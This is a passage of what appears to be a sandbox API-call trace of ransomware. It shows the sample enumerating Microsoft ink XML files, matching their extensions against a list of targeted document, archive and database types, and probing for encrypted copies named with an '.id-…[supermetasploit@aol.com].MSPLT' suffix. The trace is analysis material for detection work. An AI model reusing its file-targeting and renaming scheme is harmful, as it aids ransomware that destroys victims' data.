shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.069] lstrlenW (lpString=".1cd") returned 4 [0174.069] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.069] lstrlenW (lpString=".jpg") returned 4 [0174.069] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.070] lstrlenW (lpString=".doc") returned 4 [0174.070] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.070] lstrlenW (lpString=".docx") returned 5 [0174.070] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0174.070] lstrlenW (lpString=".pdf") returned 4 [0174.070] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.070] lstrlenW (lpString=".xls") returned 4 [0174.070] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.070] lstrlenW (lpString=".xlsx") returned 5 [0174.070] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0174.070] lstrlenW (lpString=".ppt") returned 4 [0174.070] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.070] lstrlenW (lpString=".zip") returned 4 [0174.070] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.070] lstrlenW (lpString=".rar") returned 4 [0174.070] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.070] lstrlenW (lpString=".bz2") returned 4 [0174.070] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.070] lstrlenW (lpString=".7z") returned 3 [0174.070] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.070] lstrlenW (lpString=".dbf") returned 4 [0174.070] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.070] lstrlenW (lpString=".1cd") returned 4 [0174.070] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.071] lstrlenW (lpString=".jpg") returned 4 [0174.071] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.071] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0174.071] lstrlenW (lpString="base_jpn.xml") returned 12 [0174.071] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0174.079] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=804) returned 1 [0174.079] CloseHandle (hObject=0x344) returned 1 [0174.079] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml")) returned 0x20 [0174.079] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.080] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.080] lstrlenW (lpString=".doc") returned 4 [0174.080] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.080] lstrlenW (lpString=".docx") returned 5 [0174.080] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0174.080] lstrlenW (lpString=".pdf") returned 4 [0174.080] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.080] lstrlenW (lpString=".xls") returned 4 [0174.080] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.080] lstrlenW (lpString=".xlsx") returned 5 [0174.080] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0174.080] lstrlenW (lpString=".ppt") returned 4 [0174.080] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.080] lstrlenW (lpString=".zip") returned 4 [0174.080] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.080] lstrlenW (lpString=".rar") returned 4 [0174.080] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.080] lstrlenW (lpString=".bz2") returned 4 [0174.080] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.080] lstrlenW (lpString=".7z") returned 3 [0174.081] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.081] lstrlenW (lpString=".dbf") returned 4 [0174.081] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.081] lstrlenW (lpString=".1cd") returned 4 [0174.081] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.081] lstrlenW (lpString=".jpg") returned 4 [0174.081] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.081] lstrlenW (lpString=".doc") returned 4 [0174.081] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.081] lstrlenW (lpString=".docx") returned 5 [0174.081] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0174.081] lstrlenW (lpString=".pdf") returned 4 [0174.081] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.081] lstrlenW (lpString=".xls") returned 4 [0174.081] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.081] lstrlenW (lpString=".xlsx") returned 5 [0174.081] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0174.081] lstrlenW (lpString=".ppt") returned 4 [0174.081] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.081] lstrlenW (lpString=".zip") returned 4 [0174.082] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.082] lstrlenW (lpString=".rar") returned 4 [0174.082] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.082] lstrlenW (lpString=".bz2") returned 4 [0174.082] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.082] lstrlenW (lpString=".7z") returned 3 [0174.082] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.082] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.082] lstrlenW (lpString=".dbf") returned 4 [0174.082] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.082] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.082] lstrlenW (lpString=".1cd") returned 4 [0174.082] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.082] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0174.082] lstrlenW (lpString=".jpg") returned 4 [0174.082] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.082] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0174.082] lstrlenW (lpString="ja-jp.xml") returned 9 [0174.082] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0174.084] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=16616) returned 1 [0174.084] CloseHandle (hObject=0x344) returned 1 [0174.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml")) returned 0x20 [0174.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.084] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.084] lstrlenW (lpString=".doc") returned 4 [0174.084] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.084] lstrlenW (lpString=".docx") returned 5 [0174.084] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0174.085] lstrlenW (lpString=".pdf") returned 4 [0174.085] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.085] lstrlenW (lpString=".xls") returned 4 [0174.085] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.085] lstrlenW (lpString=".xlsx") returned 5 [0174.085] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0174.085] lstrlenW (lpString=".ppt") returned 4 [0174.085] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.085] lstrlenW (lpString=".zip") returned 4 [0174.085] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.085] lstrlenW (lpString=".rar") returned 4 [0174.085] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.085] lstrlenW (lpString=".bz2") returned 4 [0174.085] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.085] lstrlenW (lpString=".7z") returned 3 [0174.085] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.085] lstrlenW (lpString=".dbf") returned 4 [0174.085] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.085] lstrlenW (lpString=".1cd") returned 4 [0174.085] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.085] lstrlenW (lpString=".jpg") returned 4 [0174.085] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.086] lstrlenW (lpString=".doc") returned 4 [0174.086] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.086] lstrlenW (lpString=".docx") returned 5 [0174.086] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0174.086] lstrlenW (lpString=".pdf") returned 4 [0174.086] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.086] lstrlenW (lpString=".xls") returned 4 [0174.086] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.086] lstrlenW (lpString=".xlsx") returned 5 [0174.086] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0174.086] lstrlenW (lpString=".ppt") returned 4 [0174.086] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.086] lstrlenW (lpString=".zip") returned 4 [0174.086] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.086] lstrlenW (lpString=".rar") returned 4 [0174.086] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.086] lstrlenW (lpString=".bz2") returned 4 [0174.086] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.086] lstrlenW (lpString=".7z") returned 3 [0174.086] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.086] lstrlenW (lpString=".dbf") returned 4 [0174.086] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.086] lstrlenW (lpString=".1cd") returned 4 [0174.086] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 79 [0174.087] lstrlenW (lpString=".jpg") returned 4 [0174.087] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.087] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0174.087] lstrlenW (lpString="ko-kr.xml") returned 9 [0174.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0174.089] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=15097) returned 1 [0174.089] CloseHandle (hObject=0x344) returned 1 [0174.089] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml")) returned 0x20 [0174.089] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.092] lstrlenW (lpString=".doc") returned 4 [0174.092] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.092] lstrlenW (lpString=".docx") returned 5 [0174.092] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0174.092] lstrlenW (lpString=".pdf") returned 4 [0174.092] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.092] lstrlenW (lpString=".xls") returned 4 [0174.092] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.092] lstrlenW (lpString=".xlsx") returned 5 [0174.092] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0174.092] lstrlenW (lpString=".ppt") returned 4 [0174.092] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.093] lstrlenW (lpString=".zip") returned 4 [0174.093] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.093] lstrlenW (lpString=".rar") returned 4 [0174.093] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.093] lstrlenW (lpString=".bz2") returned 4 [0174.093] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.093] lstrlenW (lpString=".7z") returned 3 [0174.093] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.093] lstrlenW (lpString=".dbf") returned 4 [0174.093] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.093] lstrlenW (lpString=".1cd") returned 4 [0174.093] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.094] lstrlenW (lpString=".jpg") returned 4 [0174.094] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.094] lstrlenW (lpString=".doc") returned 4 [0174.094] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.094] lstrlenW (lpString=".docx") returned 5 [0174.094] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0174.094] lstrlenW (lpString=".pdf") returned 4 [0174.094] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.094] lstrlenW (lpString=".xls") returned 4 [0174.094] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.094] lstrlenW (lpString=".xlsx") returned 5 [0174.094] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0174.094] lstrlenW (lpString=".ppt") returned 4 [0174.094] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.094] lstrlenW (lpString=".zip") returned 4 [0174.094] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.094] lstrlenW (lpString=".rar") returned 4 [0174.094] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.094] lstrlenW (lpString=".bz2") returned 4 [0174.094] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.094] lstrlenW (lpString=".7z") returned 3 [0174.094] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.095] lstrlenW (lpString=".dbf") returned 4 [0174.095] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.095] lstrlenW (lpString=".1cd") returned 4 [0174.095] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0174.095] lstrlenW (lpString=".jpg") returned 4 [0174.095] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.095] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0174.095] lstrlenW (lpString="zh-dayi.xml") returned 11 [0174.095] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0174.103] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=11067) returned 1 [0174.103] CloseHandle (hObject=0x358) returned 1 [0174.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml")) returned 0x20 [0174.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.104] lstrlenW (lpString=".doc") returned 4 [0174.104] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.104] lstrlenW (lpString=".docx") returned 5 [0174.104] lstrcmpiW (lpString1=".docx", lpString2="i.xml") returned -1 [0174.104] lstrlenW (lpString=".pdf") returned 4 [0174.104] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.104] lstrlenW (lpString=".xls") returned 4 [0174.104] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.104] lstrlenW (lpString=".xlsx") returned 5 [0174.104] lstrcmpiW (lpString1=".xlsx", lpString2="i.xml") returned -1 [0174.104] lstrlenW (lpString=".ppt") returned 4 [0174.104] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.104] lstrlenW (lpString=".zip") returned 4 [0174.104] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.104] lstrlenW (lpString=".rar") returned 4 [0174.104] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.104] lstrlenW (lpString=".bz2") returned 4 [0174.104] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.104] lstrlenW (lpString=".7z") returned 3 [0174.104] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.104] lstrlenW (lpString=".dbf") returned 4 [0174.104] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.104] lstrlenW (lpString=".1cd") returned 4 [0174.105] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.105] lstrlenW (lpString=".jpg") returned 4 [0174.105] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.105] lstrlenW (lpString=".doc") returned 4 [0174.105] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.105] lstrlenW (lpString=".docx") returned 5 [0174.105] lstrcmpiW (lpString1=".docx", lpString2="i.xml") returned -1 [0174.105] lstrlenW (lpString=".pdf") returned 4 [0174.105] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.105] lstrlenW (lpString=".xls") returned 4 [0174.105] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.105] lstrlenW (lpString=".xlsx") returned 5 [0174.105] lstrcmpiW (lpString1=".xlsx", lpString2="i.xml") returned -1 [0174.105] lstrlenW (lpString=".ppt") returned 4 [0174.105] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.105] lstrlenW (lpString=".zip") returned 4 [0174.105] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.105] lstrlenW (lpString=".rar") returned 4 [0174.106] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.106] lstrlenW (lpString=".bz2") returned 4 [0174.106] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.106] lstrlenW (lpString=".7z") returned 3 [0174.106] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft 